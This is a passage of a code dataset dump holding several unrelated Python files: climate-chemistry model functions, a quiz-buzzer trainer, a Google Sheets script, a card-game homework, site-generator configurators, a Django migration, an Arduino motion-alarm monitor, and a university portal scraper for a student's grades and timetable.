(alk-carb)/K2,\r\n alk-2.0*carb])\r\n\r\n H_ion = np.max(roots) #just take the positive root\r\n pH = -log10(H_ion) #equation S16 (aka pH definition)\r\n\r\n CO3 = alk/(2.0+H_ion/K2) #S14 with S11\r\n HCO3 = alk - 2.0*CO3 #S11\r\n CO2_aq = H_ion*HCO3/K1 #S13\r\n pCO2 = CO2_aq/H_CO2 #S12\r\n Ca_ion = 0.5*(alk - alk_init) + Ca_init #S17\r\n\r\n K_sp = carbonateSolubility(T)\r\n omega = Ca_ion*CO3/K_sp # S18\r\n\r\n\r\n return [omega, pCO2, pH]\r\n\r\n\r\ndef carbonateSolubility(T):\r\n \"\"\"\r\n Calculates carbonate solubility rate constant as a function of temperature.\r\n See Appendix A of JKT 2018 for further details (you'll need to look at\r\n their 2017 paper for these actual equations - but Appendix A tells you \r\n that).\r\n\r\n Inputs:\r\n T - the temperature of the system [K]\r\n\r\n Returns:\r\n result - the solubility rate constant\r\n \"\"\"\r\n bo = -0.77712\r\n b1 = 0.0028426\r\n b2 = 178.34\r\n co = -0.07711\r\n do = 0.0041249\r\n S = 35.0\r\n logK0=-171.9065-0.077993*T+2839.319/T+71.595*log10(T) \r\n logK=logK0+(bo+b1*T+b2/T)*S**0.5+co*S+do*S**1.5\r\n\r\n result = 10.0**logK\r\n\r\n return result\r\n\r\n\r\ndef equilibriumRateConstants(T):\r\n \"\"\"\r\n Calculates the carbon chemistry equilibrium constants as a function of \r\n temperature following the method in Appendix A of JKT 2018 (you actually\r\n have to look at their 2017 paper for these equations).\r\n\r\n Inputs:\r\n T - the temperature of the system [K]\r\n\r\n Returns:\r\n K1 - the first apparent dissociation rate constant of carbonic acid\r\n K2 - the second apparent dissociation rate constant of carbonic acid\r\n H_CO2 - Henry's law constant for CO2\r\n \"\"\"\r\n\r\n pK1=17.788 - .073104 *T - .0051087*35 + 1.1463*10**-4*T**2\r\n pK2=20.919 - .064209 *T - .011887*35 + 8.7313*10**-5*T**2\r\n H_CO2=exp(9345.17/T - 167.8108 + 23.3585 * log(T) + \r\n (.023517 - 2.3656*10**-4*T+4.7036*10**-7*T**2)*35)\r\n \r\n K1 = 10.0**-pK1\r\n K2 = 10.0**-pK2\r\n\r\n return [K1,K2,H_CO2]\r\n\r\n\r\ndef deepOceanTemperature(Ts, gradient, min_temp=271.15):\r\n \"\"\"\r\n Determine the deep ocean temperature based on the surface temperature. The\r\n intercept term is chosen so that gradient*Ts+intercept gives the correct\r\n surface temperature. In the case of the modern Earth, that would be the\r\n modern average surface temperature. This function corresponds to equation\r\n S20.\r\n\r\n Inputs:\r\n Ts - surface temperature [K]\r\n gradient - total temperature gradient in the ocean [dimensionless]\r\n min_temp - the minimum allowable temperature at the bottom of the \r\n ocean. For an Earth-like planet below 271.15 K (the default\r\n value) the ocean would freeze.\r\n\r\n Returns:\r\n Td - the temperature at the bottom of the ocean [K]\r\n \"\"\"\r\n\r\n # intercept chosen to reproduce initial (modern) temperature\r\n intercept = 274.037 - gradient*Ts \r\n Td = np.max([np.min([gradient*Ts+intercept, Ts]), min_temp])\r\n\r\n return Td\r\n\r\n\r\n# This function is the CO2-only climate model\r\ndef surfaceTempFromPureCO2ClimateModel(pCO2, flux):\r\n \"\"\"\r\n This function will return the surface temperature of a Earth-like planet for\r\n the given partial pressure of pCO2 and incident flux (normalized to modern\r\n Earth's). The function is defined for CO2 levels between >1.0E-7 and <0.8 \r\n bar. The flux definitions are from 1.05 to 0.31 (the HZ for a Sun-like\r\n star). The fit is to a 4th order polynomial over CO2 and flux.\r\n\r\n Inputs:\r\n pCO2 - the CO2 partial pressure of the atmosphere [bar]\r\n flux - the incident flux normalised to the modern Earths (i.e. divided\r\n by ~1360 [W m-2])\r\n\r\n Returns:\r\n the surface temperature of the planet [K]\r\n \"\"\"\r\n #the fit was done in log space for CO2\r\n x = np.log(pCO2)\r\n y = flux\r\n\r\n coeffs = np.array([4.8092693271e+00, -2.2201836059e+02, -6.8437057004e+01, \r\n -6.7369814833e+00, -2.0576569974e-01, 1.4144615786e+03, \r\n 4.4638645525e+02, 4.4412679359e+01, 1.3641352778e+00, -2.9643244170e+03, \r\n -9.7844390774e+02, -9.8858815404e+01, -3.0586461777e+00, \r\n 2.6547903068e+03, 9.0749599550e+02, 9.2870700889e+01, 2.8915352308e+00, \r\n -8.6843290311e+02, -3.0464088878e+02, -3.1476199768e+01, \r\n -9.8478712084e-01, 1.0454688611e+03, -1.4964888001e+03, \r\n 1.0637917601e+03, -2.8114373919e+02])\r\n\r\n p4_in = np.array([1, x, x**2, x**3, x**4, x*y, x**2*y, x**3*y, x**4*y, \r\n x*y**2, x**2*y**2, x**3*y**2, x**4*y**2, x*y**3, x**2*y**3, x**3*y**3, \r\n x**4*y**3, x*y**4, x**2*y**4, x**3*y**4, x**4*y**4, y, y**2, y**3, \r\n y**4])\r\n\r\n return np.sum(p4_in*coeffs)\r\n\r\n\r\ninpts = ModelInputs()\r\nlums = np.linspace(1, 0.6, 10)\r\ninpts.f_bio = 1\r\nCO2s = []\r\nfor lum in lums:\r\n inpts.lum = lum\r\n [pCO2, pH, Ts], times, y_vals, status = runWeatheringModelPore(inputs=inpts,\r\n guess=None, chem_tol=1.0E-5, chem_max_iter=10, timestep=1000.0)\r\n CO2s.append(pCO2)\r\n\r\nprint(\"CO2s:\")\r\nprint(CO2s)\r\nprint(\"-----------\")\r\nprint(\"Lums:\")\r\nprint(lums)\r\n\r\n#print(\"Input flux: %0.2f\"%(inpts.lum))\r\n#print(\"pH=%2.3e\"%(pH))\r\n#print(\"pCO2=%2.3e\"%(pCO2))\r\n#print(\"Ts=%2.3e\"%(Ts))\r\n","sub_path":"model_functions.py","file_name":"model_functions.py","file_ext":"py","file_size_in_byte":26837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"653923062","text":"import os\nimport pickle\nimport numpy as np\nimport argparse\nfrom collections import defaultdict, namedtuple\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import Variable\nfrom chainer import cuda\n\nfrom qanta.guesser.abstract import AbstractGuesser\nfrom qanta.util import constants as c\nfrom qanta.buzzer.util import GUESSERS\nfrom qanta import qlogging\n\nfrom qanta.buzzer.progress import ProgressBar\n\nN_GUESSERS = len(GUESSERS)\nlog = qlogging.get(__name__)\n\nclass Trainer(object):\n\n def __init__(self, model, model_dir=None):\n self.model = model\n self.model_dir = model_dir\n self.optimizer = chainer.optimizers.Adam()\n self.optimizer.setup(self.model)\n self.optimizer.add_hook(chainer.optimizer.GradientClipping(5))\n\n def backprop(self, loss):\n self.optimizer.target.cleargrads()\n self.optimizer.update(lossfun=lambda: loss)\n\n def loss(self, ys, ts, mask):\n # ys: [length * batch_size, n_guessers]\n # ts: [length * batch_size, n_guessers]\n # mask: [length * batch_size]\n xp = self.model.xp\n ts = xp.asarray(ts.data, dtype=xp.float32)\n ys = F.log_softmax(ys) # length * batch_size, n_guessers\n loss = -F.sum(F.sum(ys * ts, axis=1) * mask.data) / mask.data.sum()\n return loss\n\n def metric(self, ys, ts, mask):\n # shapes are length * batch_size * n_guessers\n if ys.shape != ts.shape:\n raise ValueError(\"Shape of prediction {0} does not match with ground \\\n truth {1}.\".format( ys.shape, ts.shape))\n if ys.shape[0] != mask.shape[0]:\n raise ValueError(\"Shape0 of prediction {0} does not match with \\\n mask0 {1}.\".format(ys.shape[0], mask.shape[0]))\n stats = dict()\n ys = F.argmax(ys, axis=1)\n ts = self.model.xp.asarray(ts, dtype=self.model.xp.float32)\n correct = F.sum((F.select_item(ts, ys) * mask)).data\n total = mask.sum()\n stats['acc'] = (correct / total).tolist()\n return stats\n\n def test(self, test_iter):\n buzzes = dict()\n # progress_bar = ProgressBar(test_iter.size, unit_iteration=True)\n for i in range(test_iter.size):\n batch = test_iter.next_batch(self.model.xp)\n length, batch_size, _ = batch.vecs.shape\n ys = self.model(batch.vecs, train=False)\n ys = F.softmax(ys) # length * batch_size, n_guessers+1\n ys = F.swapaxes(F.reshape(ys, (length, batch_size, -1)), 0, 1)\n ys.to_cpu()\n masks = batch.mask.T.tolist()\n assert len(masks) == batch_size\n for qnum, scores, mask in zip(batch.qids, ys.data, masks):\n if isinstance(qnum, np.ndarray):\n qnum = qnum.tolist()\n total = int(sum(mask))\n buzzes[qnum] = scores[:total].tolist()\n\n # for t in range(total):\n # q = buzzes[qnum][t][0]\n # if q < 0.6 and q > 0.5:\n # buzzes[qnum][t][0] -= 0.1\n # buzzes[qnum][t][1] += 0.1\n \n # progress_bar(*test_iter.epoch_detail)\n test_iter.finalize(reset=True)\n # progress_bar.finalize()\n return buzzes\n\n def evaluate(self, eval_iter):\n stats = defaultdict(lambda: 0)\n # progress_bar = ProgressBar(eval_iter.size, unit_iteration=True)\n for i in range(eval_iter.size):\n batch = eval_iter.next_batch(self.model.xp)\n length, batch_size, _ = batch.vecs.shape\n ys = self.model(batch.vecs, train=False)\n ts = F.reshape(batch.results, (length * batch_size, -1))\n mask = F.reshape(batch.mask, (length * batch_size, ))\n stats['loss'] = self.loss(ys, ts, mask).data.tolist()\n batch_stats = self.metric(ys.data, ts.data, mask.data)\n for k, v in batch_stats.items():\n stats[k] += v\n\n # progress_bar(*eval_iter.epoch_detail)\n eval_iter.finalize(reset=True)\n # progress_bar.finalize()\n\n for k, v in stats.items():\n stats[k] = v / eval_iter.size\n return stats\n\n def train_one_epoch(self, train_iter, progress_bar=None):\n stats = defaultdict(lambda: 0)\n for i in range(train_iter.size):\n batch = train_iter.next_batch(self.model.xp)\n length, batch_size, _ = batch.vecs.shape\n ys = self.model(batch.vecs, train=True)\n ts = F.reshape(batch.results, (length * batch_size, -1))\n mask = F.reshape(batch.mask, (length * batch_size, ))\n loss = self.loss(ys, ts, mask)\n self.backprop(loss)\n stats['loss'] = loss.data.tolist()\n batch_stats = self.metric(ys.data, ts.data, mask.data)\n for k, v in batch_stats.items():\n stats[k] += v\n\n if progress_bar is not None:\n progress_bar(*train_iter.epoch_detail)\n train_iter.finalize()\n if progress_bar is not None:\n progress_bar.finalize()\n\n for k, v in stats.items():\n stats[k] = v / train_iter.size\n return stats\n\n def run(self, train_iter=None, eval_iter=None, n_epochs=1, verbose=True):\n # progress_bar = ProgressBar(n_epochs, unit_iteration=False)\n progress_bar = None\n for epoch in range(n_epochs):\n if verbose:\n log.info('epoch {0}'.format(epoch))\n if train_iter is not None:\n train_stats = self.train_one_epoch(train_iter, progress_bar)\n if verbose:\n output = 'train '\n for k, v in train_stats.items():\n output += '{0}: {1:.2f} '.format(k, v)\n log.info(output)\n if eval_iter is not None:\n eval_stats = self.evaluate(eval_iter)\n if verbose:\n output = 'eval '\n for k, v in eval_stats.items():\n output += '{0}: {1:.2f} '.format(k, v)\n log.info(output)\n if self.model_dir is not None:\n chainer.serializers.save_npz(self.model_dir, self.model)\n train_iter.finalize(reset=True)\n","sub_path":"qanta/buzzer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"89104197","text":"from googleapiclient.discovery import build\nfrom google.oauth2 import service_account\n\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\nSERVICE_ACCOUNT_FILE = 'keys.json'\n\ncreds = None\ncreds = service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n# The ID and range of a sample spreadsheet.\nSAMPLE_SPREADSHEET_ID = '1bNSfi_e7Q9Ii7M6RUnulx9ta0hvv4oNBqgXTeHO_NSI'\n# SAMPLE_RANGE_NAME = 'Class Data!A2:E'\n\nservice = build('sheets', 'v4', credentials=creds)\n\n# Call the Sheets API\nsheet = service.spreadsheets()\nresult = sheet.values().get(spreadsheetId=SAMPLE_SPREADSHEET_ID,\n range=\"automated!B2:L31\").execute()\nvalues = result.get('values', [])\n\naoa = [[\"this_is\",2000],[\"an_automated\",4000],[\"update_test\",6000],[\"into_gsheet\",10000]]\n\nrequest = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID,\n range=\"writing_automated!B2\", valueInputOption=\"USER_ENTERED\", body={\"values\":aoa}).execute()\n\nprint(values)\n# if not values:\n# print('No data found.')\n# else:\n# print('Name, Major:')\n# for row in values:\n# # Print columns A and E, which correspond to indices 0 and 4.\n# print('%s, %s' % (row[0], row[4]))\n","sub_path":"python/gsheet_functions.py","file_name":"gsheet_functions.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"562183413","text":"\nfrom abc import ABCMeta, abstractmethod\nimport sys\nimport random\n\n#listofCards\n#method that deals a card from the list randomly without replacement like hw2\n\n#a constructor that sets up the list of rand\n# omly shuffled cards\n#make a new deck using constructor when cards run out\nclass Deck(object):\n listOfCards = {}\n deckArray=[]\n listRandomArray = []\n\n def __init__(self):\n print(\"ionside constructor\")\n # self.initializeKeyArray()\n self.createDeck()\n self.shuffle()\n # self.printDeck()\n self.amountOfCardsCheck()\n\n # self.initializeKeyArray()\n def amountOfCardsCheck(self):\n print(len(self.deckArray))\n if len(self.deckArray) <= 8:\n print(\"if len(self.deckArray)<= 3:\")\n self.initializeKeyArray()\n # self.shuffle()\n\n def createDeck(self):\n for i in range(66):\n if(i <= 22):\n self.listOfCards[i] = str(i % 22) + \" Rock\"\n\n if (i > 22 and i <= 44):\n self.listOfCards[i] = str(i % 22) + \" Paper\"\n\n if (i >= 44 and i <= 66):\n self.listOfCards[i] =str(i % 22) + \" Scissors\"\n\n def initializeKeyArray(self):\n print(\"initialize Array\")\n self.deckArray = list(range(66))\n print(self.deckArray)\n print(len(self.deckArray))\n\n def printDeck(self):\n # for i in range(66):\n # print(str(i) + \" \" + str(self.deckArray[i]))\n # print(\"printDeck\")\n for i in self.listOfCards:\n print(str(self.listOfCards[self.deckArray[i]]))\n # for i in self.deckArray:\n # print(self.deckArray[i])\n\n\n # deckArray=[]\n # listRandomArray = []\n def shuffle(self):\n self.deckArray = list(self.listOfCards)\n random.shuffle(self.deckArray)\n self.deckArray[:66]\n self.printDeck()\n\n\n\n# // abstaract class that has an integer value\n# // has a constructor that takes in an int value\nclass Card(object):\n ___metaclass__ = ABCMeta\n @abstractmethod\n def __init__(self, intValue):\n print(intValue)\n\nclass RockCard:\n print(' Rock Card')\n #integer value 0\n # appropriate String representatrion for the suit\n # inherit from Card\n #instance method takes a card as an argument returns boolean\n # (cont) reflects wheter this card beats the other card\n\nclass PaperCard:\n print('papercard')\n #integer value 1\n # appropriate String representatrion for the suit\n # inherit from Card\n #instance method takes a card as an argument returns boolean\n # (cont) reflects wheter this card beats the other card\nclass ScissorsCard:\n print('Scissors Card')\n # integer value 2\n # appropriate String representatrion for the suit\n # inherit from Card\n #instance method takes a card as an argument returns boolean\n # (cont) reflects wheter this card beats the other card\n\nclass Test(RockCard, PaperCard, ScissorsCard):\n def __init__(self):\n super(Test, self).__init__()\n\n\nclass SetGameStatus:\n exit = False\n\n\n#create random array and point to the deck\n#create user account\n\n#create specific class systmes and user dicitonary\n#\n# fullDeckOfCards = {}\n#\n# def createDeck():\n# for i in range(66):\n# if(i <= 22):\n# SetGameStatus.fullDeckOfCards[i] = str(i % 22) + \" Rock\"\n#\n# if (i > 22 and i <= 44):\n# SetGameStatus.fullDeckOfCards[i] = str(i % 22) + \" Paper\"\n#\n# if (i >= 44 and i <= 66):\n# SetGameStatus.fullDeckOfCards[i] =str(i % 22) + \" Scissors\"\n#\n\n\n\ndeck=Deck()\n\n\n\nprint(\"size of deckArray\" + str(len(deck.deckArray)))\n\n\n\n\n\nwhile(not SetGameStatus.exit ):\n print(\"test \" + str(SetGameStatus.exit))\n\n\n SetGameStatus.exit = True\n\n\n","sub_path":"Python/Fall_2016/Homework/hw_3_preVersion_I.py","file_name":"hw_3_preVersion_I.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"46736151","text":"\"\"\"\nConfigurators are functions that are used to customize the data building process.\n\"\"\"\nimport os\nimport re\nimport yaml\n\nfrom whitenoise.tree import Directory, Node\n\n\nclass Configurator(object):\n def __call__(self, thing):\n try:\n if isinstance(thing, Directory):\n self.configurate_dir(thing)\n elif isinstance(thing, Node):\n self.configurate_file(thing)\n except NotImplementedError:\n pass\n\n def configurate_dir(self, directory):\n raise NotImplemented\n\n def configurate_file(self, node):\n raise NotImplemented\n\n\nfront_matter_re = re.compile('^---\\\\s*\\\\n([\\\\s\\\\S]*?\\\\n?)^---\\\\s*$\\\\n?', re.M)\n\n\ndef parse_front_matter(content):\n \"\"\"\n Returns a tuple of content and extracted data.\n \"\"\"\n match = front_matter_re.search(content)\n\n if match:\n content = content[match.end(0):].strip()\n data = yaml.load(match.group(1))\n else:\n data = {}\n\n return (content, data)\n\n\ndef front_matter_configurator(node):\n with open(node.path, 'r') as f:\n node.content, data = parse_front_matter(f.read())\n node.data.update(data)\n\n\nclass URLConfigurator(Configurator):\n def __init__(self, pattern, root_url=None):\n self.pattern = pattern\n self.root_url = root_url or '/'\n\n def configurate_dir(self, directory):\n path = directory.name\n if directory.parent:\n path = directory.parent.data['url'] + path\n directory.data['url'] = path + '/'\n target = os.path.join(directory.parent.data['target'], path)\n directory.data['target'] = directory.data['url']\n else:\n directory.data['url'] = self.root_url\n directory.data['target'] = ''\n\n def configurate_file(self, node):\n sub_part = self.pattern.format(**node.data)\n\n if node.is_index():\n node.data['url'] = node.parent.data['url']\n else:\n node.data['url'] = node.parent.data['url'] + sub_part\n\n node.data['target'] = os.path.join(node.parent.data['target'], sub_part)\n","sub_path":"whitenoise/configurators.py","file_name":"configurators.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597733336","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('mytest', '0002_auto_20151122_0932'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='session_key',\n field=models.CharField(default=b'', max_length=32),\n ),\n ]\n","sub_path":"mytest/migrations/0003_message_session_key.py","file_name":"0003_message_session_key.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392949899","text":"#!/usr/bin/env python3\n\nimport os.path\nfrom smtplib import SMTP_SSL\nfrom email.mime.text import MIMEText\nfrom time import time, localtime, strftime\nimport serial\nimport psutil\nimport subprocess\nimport threading\nimport config\n\n\ndef main():\n init()\n connect_to_arduino()\n while True:\n wait_for_movement()\n movement_detected()\n\ndef error(msg, notify=True):\n print(\"ERROR: %s\" % msg)\n\n if notify:\n email_subject = \"URGENT: Alarm error!\"\n email_text = \"The following error occured at %s: %s\" % (get_time(), msg)\n\n msg = MIMEText(email_text, 'plain')\n msg['From'] = config.email_sender\n msg['Subject'] = email_subject\n send_email(msg)\n\n exit(1)\n\ndef init():\n # check if arduino device exists\n if os.path.exists(config.dev_arduino) == False:\n error(\"Arduino device '%s' does not exist.\" % config.dev_arduino)\n\n # check if alarm armed state file exists\n if os.path.isfile(config.file_armed) == False:\n error(\"Alarm armed state file could not be found.\")\n\n # check if alarm log file exists\n if os.path.isfile(config.file_log) == False:\n error(\"Alarm log file could not be found.\")\n\n # check if video dir exists\n if os.path.isdir(config.dir_videos) == False:\n error(\"Video directory does not exist.\")\n\n global t_last_alarm_notification\n t_last_alarm_notification = 0\n\ndef connect_to_arduino():\n global ser\n try:\n ser = serial.Serial(port=config.dev_arduino, baudrate=9600)\n except:\n error(\"Could not open arduino device '%s'.\" % config.dev_arduino)\n\ndef wait_for_movement():\n try:\n ser.read()\n except serial.SerialException:\n error(\"Reading from arduino device failed.\")\n\n\ndef movement_detected():\n global t_last_alarm_notification\n\n armed = is_armed()\n recording = armed and is_cam_connected() and (is_cam_recording() == False)\n notification = armed and (int(time()) - t_last_alarm_notification) > config.t_notification_backoff\n\n if recording:\n start_recording()\n\n if notification:\n notify_alarm(recording)\n t_last_alarm_notification = int(time())\n\n log_movement(armed, recording=recording, notification=notification)\n\ndef get_time():\n return strftime(\"%Y/%m/%d - %H:%M:%S\", localtime())\n\ndef log(msg):\n try:\n with open(config.file_log, 'a') as f:\n f.write(\"%s\\n\" % msg)\n except:\n error(\"Alarm log file could not be written.\")\n\ndef is_armed():\n try:\n with open(config.file_armed, 'r') as f:\n return f.read(1) == '1'\n except:\n error(\"Alarm armed state file could not be read.\")\n\ndef is_cam_recording():\n for proc in psutil.process_iter():\n if proc.name() == \"vlc\":\n return True\n return False\n\ndef is_cam_connected():\n return os.path.exists(config.dev_camara)\n\ndef send_email(msg):\n try:\n conn = SMTP_SSL(config.smtp_server_host, config.smtp_server_port)\n conn.login(config.smtp_server_username, config.smtp_server_password)\n try:\n conn.sendmail(config.email_sender, config.email_dest, msg.as_string())\n finally:\n conn.close()\n except Exception:\n error(\"Failed to send email alarm notification\", False)\n\ndef notify_alarm(recording):\n email_subject = \"URGENT: Alarm went off!\"\n email_text = \"An alarm went off at %s. \" % get_time()\n\n if recording:\n email_text += \"Webcam recording was startet.\"\n else:\n email_text += \"Webcam recording was not startet.\"\n\n msg = MIMEText(email_text, 'plain')\n msg['From'] = config.email_sender\n msg['Subject'] = email_subject\n\n send_email(msg)\n\ndef log_movement(armed, recording, notification):\n if armed:\n msg_armed = \"Alarm armed\"\n else:\n msg_armed = \"Alarm not armed\"\n\n if recording:\n msg_recording = \"recording started\"\n else:\n msg_recording = \"recording not started\"\n\n if notification:\n msg_notification = \"notification sent\"\n else:\n msg_notification = \"no notification sent\"\n\n msg = \"%s: Movement (%s, %s, %s)\" % (get_time(), msg_armed, msg_recording, msg_notification)\n log(msg)\n\ndef start_recording():\n t = RecordingThread()\n t.start()\n\nclass RecordingThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n time = strftime(\"%y%m%d-%H%M%S\", localtime())\n\n filename = \"%s/alarm_%s.avi\" % (config.dir_videos, time)\n\n DEVNULL = open(os.devnull, 'w')\n subprocess.call([\"cvlc\",\n \"v4l2:///dev/video0:chroma=h264:width=800:height=600\",\n \"--sout\", \"#standard{access=\\\"file\\\",dst=\\\"%s\\\"}\" %\n filename, \":demux=h264\", \"--run-time=%s\" %\n config.t_recording, \"vlc://quit\"],\n stdout=DEVNULL, stderr=DEVNULL)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sw/monitor/alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"642451","text":"import copy\nimport re\n\nfrom pyquery import PyQuery as pq\nfrom bs4 import BeautifulSoup\nfrom app.models.base import db\nfrom app.models.user_next_term_schedule import UserNextTermSchedule\nfrom app.models.user_schedule import UserSchedule\nfrom app.models.user_score import UserScore\nfrom app.spider.spiderbase import SpiderBase\nfrom utils import log, getuser_agent\n\n\nclass ZjcmSpider(SpiderBase):\n\n def __init__(self, session, username):\n self.xh = username # 学号\n self.name = ''\n self.score = []\n self.schedule = []\n self.next_term_schedule = []\n self.college = '浙江传媒学院'\n self.session = session\n self.index_url = \"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(username)\n self.score_url = \"http://xuanke.cuz.edu.cn/xscjcx.aspx?\"\n self.schedule_url = \"http://xuanke.cuz.edu.cn/xskbcx.aspx?\"\n\n def get_score(self):\n index_html = self.session.get(self.index_url)\n soup = BeautifulSoup(index_html.content, 'html.parser')\n name = soup.find('span', id='xhxm').get_text()\n self.name = name.split('同学')[0]\n\n score_url = self.score_url + \"xh={}&xm={}&gnmkdm={}\".format(self.xh, self.name, 'N121605')\n headers = {\n \"User-Agent\": getuser_agent(),\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": \"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(self.xh)\n }\n self.session.headers.update(headers)\n data = {\n \"ddlXN\": \"\",\n \"ddlXQ\": \"\",\n \"__VIEWSTATE\": \"\",\n \"__VIEWSTATEGENERATOR\": \"\",\n \"__EVENTTARGET\": \"\",\n \"__EVENTARGUMENT\": \"\",\n \"ddl_kcxz\": '',\n \"btn_zcj\": \"历年成绩\",\n \"hidLanguage\": \"\"\n }\n resp = self.session.get(score_url)\n soup = BeautifulSoup(resp.text, \"lxml\")\n data[\"__VIEWSTATEGENERATOR\"] = soup.find('input', id='__VIEWSTATEGENERATOR', attrs={'value': True}).get('value', '')\n data[\"__VIEWSTATE\"] = soup.find('input', id='__VIEWSTATE', attrs={'value': True}).get('value', '')\n data[\"__EVENTTARGET\"] = soup.find('input', id='__EVENTTARGET', attrs={'value': True}).get('value', '')\n data[\"__EVENTARGUMENT\"] = soup.find('input', id='__EVENTARGUMENT', attrs={'value': True}).get('value', '')\n\n score_html = self.session.post(score_url, data)\n soup = BeautifulSoup(score_html.content, 'html.parser')\n try:\n tr = soup.find('table').find_all('tr')\n for j in tr[1:]:\n td = j.find_all('td')\n xueqi = td[0].get_text().strip() + \"-\" + td[1].get_text().strip()\n course = td[3].get_text().strip()\n xuefen = td[6].get_text().strip()\n score = td[12].get_text().strip()\n jidian = td[7].get_text().strip()\n kind = td[4].get_text().strip()\n make_up = td[-5].get_text().strip()\n rebuild = td[-4].get_text().strip()\n if make_up or rebuild:\n score = make_up\n if '必' in kind:\n xuanxiu = '必'\n elif '选' in kind:\n xuanxiu = '选'\n else:\n xuanxiu = kind\n course_score = {\n 'xh': self.xh,\n 'name': self.name,\n \"course\": course,\n 'xuanxiu': xuanxiu,\n 'score': score,\n 'jidian': jidian,\n 'xueqi': xueqi,\n 'xuefen': xuefen,\n }\n self.score.append(course_score)\n return True\n except Exception as e:\n log(e, '*****未获取到考试成绩,可能本学期未进行过考试或未进行课程评价')\n return False\n\n def get_schedule(self):\n index_html = self.session.get(self.index_url)\n soup = BeautifulSoup(index_html.content, 'html.parser')\n name = soup.find('span', id='xhxm').get_text()\n self.name = name.split('同学')[0]\n\n schedule_url = self.schedule_url + \"xh={}&xm={}&gnmkdm={}\".format(self.xh, self.name, 'N121603')\n headers = {\n \"User-Agent\": getuser_agent(),\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": \"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(self.xh)\n }\n self.session.headers.update(headers)\n schedule_html = self.session.get(schedule_url)\n page = pq(schedule_html.text)\n trs = page('tr')\n tr_len = 0\n try:\n for tr in trs[2:14]:\n if tr_len == 0:\n tr_len = len(tr)\n if tr_len == len(tr):\n jie = tr[1].text\n jie = re.findall(r'\\d+', jie)\n mon = pq(tr[2]).text()\n tues = pq(tr[3]).text()\n wed = pq(tr[4]).text()\n thur = pq(tr[5]).text()\n fri = pq(tr[6]).text()\n sat = pq(tr[7]).text()\n sun = pq(tr[8]).text()\n schedule = {\n 'name': self.name,\n 'xh': self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.schedule.append(schedule)\n elif len(tr) == tr_len - 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n mon = pq(tr[1]).text()\n tues = pq(tr[2]).text()\n wed = pq(tr[3]).text()\n thur = pq(tr[4]).text()\n fri = pq(tr[5]).text()\n sat = pq(tr[6]).text()\n sun = pq(tr[7]).text()\n schedule = {\n 'name': self.name,\n 'xh': self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.schedule.append(schedule)\n elif len(tr) != tr_len and len(tr) != 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n schedule = copy.deepcopy(self.schedule[-1])\n schedule['jie'] = jie\n self.schedule.append(schedule)\n except Exception as e:\n log(e, \"*****获取课表信息失败\")\n\n def get_next_schedule(self):\n index_html = self.session.get(self.index_url)\n soup = BeautifulSoup(index_html.content, 'html.parser')\n name = soup.find('span', id='xhxm').get_text()\n self.name = name.split('同学')[0]\n\n schedule_url = self.schedule_url + \"xh={}&xm={}&gnmkdm={}\".format(self.xh, self.name.encode('utf-8'), 'N121603')\n headers = {\n \"User-Agent\": getuser_agent(),\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": \"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(self.xh)\n }\n self.session.headers.update(headers)\n data = {\n \"__EVENTTARGET\": \"xqd\",\n \"__EVENTARGUMENT\": \"\",\n \"__LASTFOCUS\": \"\",\n \"__VIEWSTATE\": \"\",\n \"__VIEWSTATEGENERATOR\": '',\n \"xnd\": \"2019-2020\",\n \"xqd\": \"2\"\n }\n info_html = self.session.get(schedule_url)\n soup = BeautifulSoup(info_html.text, 'html.parser')\n data[\"__VIEWSTATEGENERATOR\"] = soup.find('input', id='__VIEWSTATEGENERATOR', attrs={'value': True}).get('value', '')\n data[\"__VIEWSTATE\"] = soup.find('input', id='__VIEWSTATE', attrs={'value': True}).get('value', '')\n data[\"__LASTFOCUS\"] = soup.find('input', id='__EVENTTARGET', attrs={'value': True}).get('value', '')\n data[\"__EVENTARGUMENT\"] = soup.find('input', id='__EVENTARGUMENT', attrs={'value': True}).get('value', '')\n headers = {\n \"User-Agent\": getuser_agent(),\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": 